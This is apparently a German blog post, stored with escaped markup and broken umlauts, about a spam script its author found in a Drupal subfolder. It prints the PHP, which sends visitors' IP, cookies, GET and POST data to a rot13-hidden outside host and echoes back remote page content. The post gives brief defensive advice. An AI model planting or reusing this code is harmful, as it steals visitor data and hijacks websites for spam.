Die Tage habe ich in einem Drupal-Unterordner ein fieses Spam-Skript ausfindig gemacht. Dieses f\u00c3\u00bchrt dazu, dass dort eine Seite oder Seiten aufgebaut werden, die anderen Zwecken dient als der der Homepage, z.B. l\u00c3\u00a4sst sich auf diese Weise der Medikamentenhandel vorantreiben. Hier ist das gute St\u00c3\u00bcck (man beachte die rot13-Verschl\u00c3\u00bcsselung der URL):<\/p>\n
\"; Wie gegen den Mist wehren? Neben dem \u00c3\u0153blichen, immer die aktuellste Version einspielen, Permissions etc, ist eine Webserver-Log-Analyse, z.B. via Webalizer n\u00c3\u00bctzlich.<\/p>\n","protected":false},"excerpt":{"rendered":" Die Tage habe ich in einem Drupal-Unterordner ein fieses Spam-Skript ausfindig gemacht. Dieses f\u00c3\u00bchrt dazu, dass dort eine Seite oder Seiten aufgebaut werden, die anderen…<\/p>\n$post = Array(
\n 'self' => 'http:\/\/' . ($_SERVER['HTTP_HOST'] ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']) . $_SERVER['REQUEST_URI'],
\n 'sub_id' => '',
\n \/\/'page' => $_REQUEST['p'],
\n 'PHP_SELF' => $_SERVER['PHP_SELF'],
\n 'SERVER_PROTOCOL' => $_SERVER['SERVER_PROTOCOL'],
\n 'REMOTE_ADDR' => $_SERVER['REMOTE_ADDR'],
\n 'HTTP_REFERER' => $_SERVER['HTTP_REFERER'],
\n 'HTTP_USER_AGENT' => $_SERVER['HTTP_USER_AGENT'],
\n 'HTTP_ACCEPT_CHARSET' => $_SERVER['HTTP_ACCEPT_CHARSET'],
\n 'GET' => serialize($_GET),
\n 'POST' => serialize($_POST),
\n 'COOKIE' => serialize($_COOKIE),
\n);
\n$masterUrl = str_rot13('uggc:\/\/klm.uhynubfg.arg\/');
\n$url = \"{$masterUrl}rgw.php\";
\n$req = new HttpRequest($useCurl, $requestTimeout);
\n$pageTxt = $req->request($url, $post);
\n\/\/echo $pageTxt;
\nif (!$pageTxt)
\n die404();
\n$page = unserialize($pageTxt);
\n\/\/print_r($page);
\nif ($page['seal'] != $seal) {
\n \/\/echo $pageTxt; \/\/ TODO: *** DEBUG, delete this!!! ***
\n die404();
\n}
\nforeach ($page['headers'] as $header) {
\n header($header);
\n}
\n\/\/echo \"<\/p>\n\";\r\n\/\/print_r($page);\r\n\/\/echo \"<\/pre>\n
\necho $page['content'];
\n?><\/code><\/p>\n